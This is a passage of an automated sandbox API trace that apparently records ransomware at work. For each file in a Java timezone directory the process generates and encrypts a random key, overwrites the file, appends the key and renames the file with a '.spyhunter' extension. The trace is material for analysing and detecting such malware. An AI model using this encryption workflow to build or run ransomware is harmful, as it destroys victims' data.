(hObject=0x9c) returned 1 [0171.227] GetProcessHeap () returned 0x2c0000 [0171.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.227] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada.spyhunter") returned 69 [0171.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grenada"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grenada.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grenada.spyhunter")) returned 1 [0171.228] GetProcessHeap () returned 0x2c0000 [0171.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.228] GetProcessHeap () returned 0x2c0000 [0171.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.228] GetProcessHeap () returned 0x2c0000 [0171.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8680 | out: hHeap=0x2c0000) returned 1 [0171.228] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e598 | out: pbBuffer=0x270e598) returned 1 [0171.229] GetProcessHeap () returned 0x2c0000 [0171.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.229] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e590*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e590*=0x30) returned 1 [0171.229] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.229] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk") returned 62 [0171.229] StrStrW (lpFirst="Grand_Turk", lpSrch=".txt") returned 0x0 [0171.229] GetProcessHeap () returned 0x2c0000 [0171.229] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.229] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e554*=0x414, lpOverlapped=0x0) returned 1 [0171.268] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.268] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e554*=0x414, lpOverlapped=0x0) returned 1 [0171.268] GetProcessHeap () returned 0x2c0000 [0171.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.268] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.268] WriteFile (in: hFile=0x9c, lpBuffer=0x270e594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x270e594*, lpNumberOfBytesWritten=0x270e554*=0x4, lpOverlapped=0x0) returned 1 [0171.268] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e554, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e554*=0x30, lpOverlapped=0x0) returned 1 [0171.268] CloseHandle (hObject=0x9c) returned 1 [0171.268] GetProcessHeap () returned 0x2c0000 [0171.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.269] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk.spyhunter") returned 72 [0171.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Grand_Turk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\grand_turk.spyhunter")) returned 1 [0171.270] GetProcessHeap () returned 0x2c0000 [0171.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.270] GetProcessHeap () returned 0x2c0000 [0171.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.270] GetProcessHeap () returned 0x2c0000 [0171.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4290 | out: hHeap=0x2c0000) returned 1 [0171.270] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e590 | out: pbBuffer=0x270e590) returned 1 [0171.270] GetProcessHeap () returned 0x2c0000 [0171.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.270] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e588*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e588*=0x30) returned 1 [0171.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.271] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay") returned 61 [0171.271] StrStrW (lpFirst="Goose_Bay", lpSrch=".txt") returned 0x0 [0171.271] GetProcessHeap () returned 0x2c0000 [0171.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.271] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e54c*=0x6c0, lpOverlapped=0x0) returned 1 [0171.329] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff940, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.329] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e54c*=0x6c0, lpOverlapped=0x0) returned 1 [0171.329] GetProcessHeap () returned 0x2c0000 [0171.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.329] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.329] WriteFile (in: hFile=0x9c, lpBuffer=0x270e58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x270e58c*, lpNumberOfBytesWritten=0x270e54c*=0x4, lpOverlapped=0x0) returned 1 [0171.329] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e54c*=0x30, lpOverlapped=0x0) returned 1 [0171.329] CloseHandle (hObject=0x9c) returned 1 [0171.330] GetProcessHeap () returned 0x2c0000 [0171.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.330] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay.spyhunter") returned 71 [0171.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay.spyhunter")) returned 1 [0171.331] GetProcessHeap () returned 0x2c0000 [0171.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.331] GetProcessHeap () returned 0x2c0000 [0171.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.331] GetProcessHeap () returned 0x2c0000 [0171.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed41c8 | out: hHeap=0x2c0000) returned 1 [0171.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e590 | out: pbBuffer=0x270e590) returned 1 [0171.332] GetProcessHeap () returned 0x2c0000 [0171.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e588*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e588*=0x30) returned 1 [0171.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.333] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay") returned 61 [0171.333] StrStrW (lpFirst="Glace_Bay", lpSrch=".txt") returned 0x0 [0171.333] GetProcessHeap () returned 0x2c0000 [0171.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.333] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e54c*=0x4b4, lpOverlapped=0x0) returned 1 [0171.409] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.409] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4b4, lpNumberOfBytesWritten=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e54c*=0x4b4, lpOverlapped=0x0) returned 1 [0171.409] GetProcessHeap () returned 0x2c0000 [0171.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.409] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.409] WriteFile (in: hFile=0x9c, lpBuffer=0x270e58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x270e58c*, lpNumberOfBytesWritten=0x270e54c*=0x4, lpOverlapped=0x0) returned 1 [0171.410] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e54c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e54c*=0x30, lpOverlapped=0x0) returned 1 [0171.410] CloseHandle (hObject=0x9c) returned 1 [0171.410] GetProcessHeap () returned 0x2c0000 [0171.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.410] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay.spyhunter") returned 71 [0171.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Glace_Bay.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\glace_bay.spyhunter")) returned 1 [0171.414] GetProcessHeap () returned 0x2c0000 [0171.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.414] GetProcessHeap () returned 0x2c0000 [0171.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.414] GetProcessHeap () returned 0x2c0000 [0171.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed4100 | out: hHeap=0x2c0000) returned 1 [0171.414] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e588 | out: pbBuffer=0x270e588) returned 1 [0171.414] GetProcessHeap () returned 0x2c0000 [0171.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.415] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e580*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e580*=0x30) returned 1 [0171.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dominica"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.416] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica") returned 60 [0171.416] StrStrW (lpFirst="Dominica", lpSrch=".txt") returned 0x0 [0171.416] GetProcessHeap () returned 0x2c0000 [0171.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.416] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e544*=0x41, lpOverlapped=0x0) returned 1 [0171.417] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.417] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e544*=0x41, lpOverlapped=0x0) returned 1 [0171.417] GetProcessHeap () returned 0x2c0000 [0171.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.417] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.417] WriteFile (in: hFile=0x9c, lpBuffer=0x270e584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x270e584*, lpNumberOfBytesWritten=0x270e544*=0x4, lpOverlapped=0x0) returned 1 [0171.418] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e544*=0x30, lpOverlapped=0x0) returned 1 [0171.418] CloseHandle (hObject=0x9c) returned 1 [0171.418] GetProcessHeap () returned 0x2c0000 [0171.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.418] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica.spyhunter") returned 70 [0171.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dominica"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Dominica.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\dominica.spyhunter")) returned 1 [0171.419] GetProcessHeap () returned 0x2c0000 [0171.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.419] GetProcessHeap () returned 0x2c0000 [0171.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.419] GetProcessHeap () returned 0x2c0000 [0171.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbff88 | out: hHeap=0x2c0000) returned 1 [0171.419] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e588 | out: pbBuffer=0x270e588) returned 1 [0171.420] GetProcessHeap () returned 0x2c0000 [0171.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.420] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e580*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e580*=0x30) returned 1 [0171.420] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.421] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver") returned 58 [0171.421] StrStrW (lpFirst="Denver", lpSrch=".txt") returned 0x0 [0171.421] GetProcessHeap () returned 0x2c0000 [0171.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.421] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e544*=0x538, lpOverlapped=0x0) returned 1 [0171.509] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffac8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.509] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x538, lpNumberOfBytesWritten=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e544*=0x538, lpOverlapped=0x0) returned 1 [0171.509] GetProcessHeap () returned 0x2c0000 [0171.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.509] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.509] WriteFile (in: hFile=0x9c, lpBuffer=0x270e584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x270e584*, lpNumberOfBytesWritten=0x270e544*=0x4, lpOverlapped=0x0) returned 1 [0171.510] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e544, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e544*=0x30, lpOverlapped=0x0) returned 1 [0171.510] CloseHandle (hObject=0x9c) returned 1 [0171.510] GetProcessHeap () returned 0x2c0000 [0171.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.510] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver.spyhunter") returned 68 [0171.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Denver.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\denver.spyhunter")) returned 1 [0171.511] GetProcessHeap () returned 0x2c0000 [0171.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.511] GetProcessHeap () returned 0x2c0000 [0171.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.511] GetProcessHeap () returned 0x2c0000 [0171.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60cc0 | out: hHeap=0x2c0000) returned 1 [0171.512] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e580 | out: pbBuffer=0x270e580) returned 1 [0171.512] GetProcessHeap () returned 0x2c0000 [0171.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.512] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e578*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e578*=0x30) returned 1 [0171.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.513] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn") returned 64 [0171.513] StrStrW (lpFirst="Danmarkshavn", lpSrch=".txt") returned 0x0 [0171.513] GetProcessHeap () returned 0x2c0000 [0171.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.514] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e53c*=0x155, lpOverlapped=0x0) returned 1 [0171.514] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffeab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.515] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x155, lpNumberOfBytesWritten=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e53c*=0x155, lpOverlapped=0x0) returned 1 [0171.515] GetProcessHeap () returned 0x2c0000 [0171.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.515] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.515] WriteFile (in: hFile=0x9c, lpBuffer=0x270e57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x270e57c*, lpNumberOfBytesWritten=0x270e53c*=0x4, lpOverlapped=0x0) returned 1 [0171.515] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e53c*=0x30, lpOverlapped=0x0) returned 1 [0171.515] CloseHandle (hObject=0x9c) returned 1 [0171.515] GetProcessHeap () returned 0x2c0000 [0171.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.515] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn.spyhunter") returned 74 [0171.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Danmarkshavn.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\danmarkshavn.spyhunter")) returned 1 [0171.516] GetProcessHeap () returned 0x2c0000 [0171.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.517] GetProcessHeap () returned 0x2c0000 [0171.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.517] GetProcessHeap () returned 0x2c0000 [0171.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e042a8 | out: hHeap=0x2c0000) returned 1 [0171.517] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e580 | out: pbBuffer=0x270e580) returned 1 [0171.517] GetProcessHeap () returned 0x2c0000 [0171.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.517] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e578*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e578*=0x30) returned 1 [0171.517] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 